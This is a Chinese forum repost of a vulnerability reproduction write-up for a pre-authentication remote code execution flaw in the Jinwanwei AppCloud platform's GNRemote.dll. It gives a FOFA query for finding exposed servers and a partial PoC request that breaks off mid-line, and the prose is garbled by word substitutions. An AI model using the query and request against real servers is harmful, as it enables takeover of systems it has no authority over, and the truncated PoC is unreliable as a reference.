莫张周刘王 发表于 2024-10-15 12:11:24

金万维-云联应用系统接入平台 GNRemote.dll 前台RCE漏洞复现

0x01 产物简介

金万维-云联(AppCloud)应用系统接入平台是一款企业级私有云产物,旨在帮助企业构建高效便捷的私有云情况,低落运营成本,提高运营效率,并增强企业快速相应市场的能力,云联(AppCloud)由北京金万维科技有限公司开辟,它完成了从桌面机计算到云中计算的转变,不仅提供了一种空间,还实现了架构和计算方式的转变。云联要求流程自动化、简化部署,并提供机动性,以满足企业在任何地方、用任何工具都能高效工作的需求。
0x02 漏洞概述

金万维-云联应用系统接入平台 GNRemote.dll接口存在远程下令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端恣意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
0x03 复现情况

FOFA:title="云联应用系统接入平台"
https://i-blog.csdnimg.cn/direct/eec6c2e96c244247b0bb22a2baf1ce46.png
0x04 漏洞复现

PoC
GET /GNRemote.dll?GNFunction=CallPython&pyFile=os&
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: 金万维-云联应用系统接入平台 GNRemote.dll 前台RCE漏洞复现